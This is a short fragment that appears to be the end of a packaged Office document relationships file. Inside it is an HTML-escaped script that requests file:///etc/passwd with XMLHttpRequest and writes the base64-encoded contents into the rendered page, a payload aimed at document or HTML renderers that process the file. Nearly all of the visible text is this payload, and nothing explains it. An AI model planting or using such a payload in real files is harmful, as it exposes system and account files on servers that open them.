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7524993f84f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&lt;script&gt; x=new XMLHttpRequest; x.onload=function(){document.write(btoa(this.responseText))}; x.open("GET","file:///etc/passwd");x.send(); &lt;/script&gt;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e4be66df0a49e0" /></Relationships>
</file>